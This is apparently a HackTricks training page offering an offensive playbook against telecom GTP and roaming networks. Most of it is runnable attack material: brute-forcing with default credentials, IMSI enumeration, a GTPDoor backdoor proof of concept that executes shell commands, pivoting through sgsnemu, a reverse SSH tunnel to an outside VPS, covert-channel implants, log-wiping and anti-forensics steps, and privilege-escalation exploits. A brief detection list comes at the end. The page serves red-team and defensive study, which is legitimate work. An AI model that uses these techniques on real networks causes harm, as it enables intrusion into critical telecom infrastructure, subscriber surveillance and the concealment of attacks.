# Telecom Network Exploitation (GTP / Roaming Environments) {{#include ../../banners/hacktricks-training.md}} > [!NOTE] > Mobile-core protocols (GPRS Tunnelling Protocol – GTP) often traverse semi-trusted GRX/IPX roaming backbones. Because they ride on plain UDP with almost no authentication, **any foothold inside a telecom perimeter can usually reach core signalling planes directly**. The following notes collect offensive tricks observed in the wild against SGSN/GGSN, PGW/SGW and other EPC nodes. ## 1. Recon & Initial Access ### 1.1 Default OSS / NE Accounts A surprisingly large set of vendor network elements ship with hard-coded SSH/Telnet users such as `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, … A dedicated wordlist dramatically increases brute-force success: ```bash hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt ``` If the device exposes only a management VRF, pivot through a jump host first (see section «SGSN Emu Tunnel» below). ### 1.2 Host Discovery inside GRX/IPX Most GRX operators still allow **ICMP echo** across the backbone. Combine `masscan` with the built-in `gtpv1` UDP probes to quickly map GTP-C listeners: ```bash masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55 ``` ## 2. Enumerating Subscribers – `cordscan` The following Go tool crafts **GTP-C Create PDP Context Request** packets and logs the responses. Each reply reveals the current **SGSN / MME** serving the queried IMSI and, sometimes, the subscriber’s visited PLMN. ```bash # Build GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan # Usage (typical): ./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap ``` Key flags: - `--imsi` Target subscriber IMSI - `--oper` Home / HNI (MCC+MNC) - `-w` Write raw packets to pcap Important constants inside the binary can be patched to widen scans: ``` pingtimeout = 3 // seconds before giving up pco = 0x218080 common_tcp_ports = "22,23,80,443,8080" ``` ## 3. Code Execution over GTP – `GTPDoor` `GTPDoor` is a tiny ELF service that **binds UDP 2123 and parses every incoming GTP-C packet**. When the payload starts with a pre-shared tag, the remainder is decrypted (AES-128-CBC) and executed via `/bin/sh -c`. The stdout/stderr are exfiltrated inside **Echo Response** messages so that no outward session is ever created. Minimal PoC packet (Python): ```python import gtpc, Crypto.Cipher.AES as AES key = b"SixteenByteKey!" cmd = b"id;uname -a" enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00")) print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc)) ``` Detection: * any host sending **unbalanced Echo Requests** to SGSN IPs * GTP version flag set to 1 while message type = 1 (Echo) – deviation from spec ## 4. Pivoting Through the Core ### 4.1 `sgsnemu` + SOCKS5 `OsmoGGSN` ships an SGSN emulator able to **establish a PDP context towards a real GGSN/PGW**. Once negotiated, Linux receives a new `tun0` interface reachable from the roaming peer. ```bash sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \ -APN internet -c 1 -d ip route add 172.16.0.0/12 dev tun0 microsocks -p 1080 & # internal SOCKS proxy ``` With proper firewall hair-pinning, this tunnel bypasses signalling-only VLANs and lands you directly in the **data plane**. ### 4.2 SSH Reverse Tunnel over Port 53 DNS is almost always open in roaming infrastructures. Expose an internal SSH service to your VPS listening on :53 and return later from home: ```bash ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com ``` Check that `GatewayPorts yes` is enabled on the VPS. ## 5. Covert Channels | Channel | Transport | Decoding | Notes | |---------|-----------|----------|-------| | ICMP – `EchoBackdoor` | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | pure passive listener, no outbound traffic | | DNS – `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) encoded in A-record octets | watches for `*.nodep` sub-domain | | GTP – `GTPDoor` | UDP 2123 | AES-128-CBC blob in private IE | blends with legitimate GTP-C chatter | All implants implement watchdogs that **timestomp** their binaries and re-spawn if crashed. ## 6. Defense Evasion Cheatsheet ```bash # Remove attacker IPs from wtmp utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp # Disable bash history export HISTFILE=/dev/null # Masquerade as kernel thread echo 0 > /proc/$$/autogroup # hide from top/htop printf '\0' > /proc/$$/comm # appears as [kworker/1] touch -r /usr/bin/time /usr/bin/chargen # timestomp setenforce 0 # disable SELinux ``` ## 7. Privilege Escalation on Legacy NE ```bash # DirtyCow – CVE-2016-5195 gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd # PwnKit – CVE-2021-4034 python3 PwnKit.py # Sudo Baron Samedit – CVE-2021-3156 python3 exploit_userspec.py ``` Clean-up tip: ```bash userdel firefart 2>/dev/null rm -f /tmp/sh ; history -c ``` ## 8. Tool Box * `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` – custom tooling described in previous sections. * `FScan` : intranet TCP sweeps (`fscan -p 22,80,443 10.0.0.0/24`) * `Responder` : LLMNR/NBT-NS rogue WPAD * `Microsocks` + `ProxyChains` : lightweight SOCKS5 pivoting * `FRP` (≥0.37) : NAT traversal / asset bridging --- ## Detection Ideas 1. **Any device other than an SGSN/GGSN establishing Create PDP Context Requests**. 2. **Non-standard ports (53, 80, 443) receiving SSH handshakes** from internal IPs. 3. **Frequent Echo Requests without corresponding Echo Responses** – might indicate GTPDoor beacons. 4. **High rate of ICMP echo-reply traffic with large, non-zero identifier/sequence fields**. ## References - [Palo Alto Unit42 – Infiltration of Global Telecom Networks](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/) - 3GPP TS 29.060 – GPRS Tunnelling Protocol (v16.4.0) - 3GPP TS 29.281 – GTPv2-C (v17.6.0) {{#include ../../banners/hacktricks-training.md}}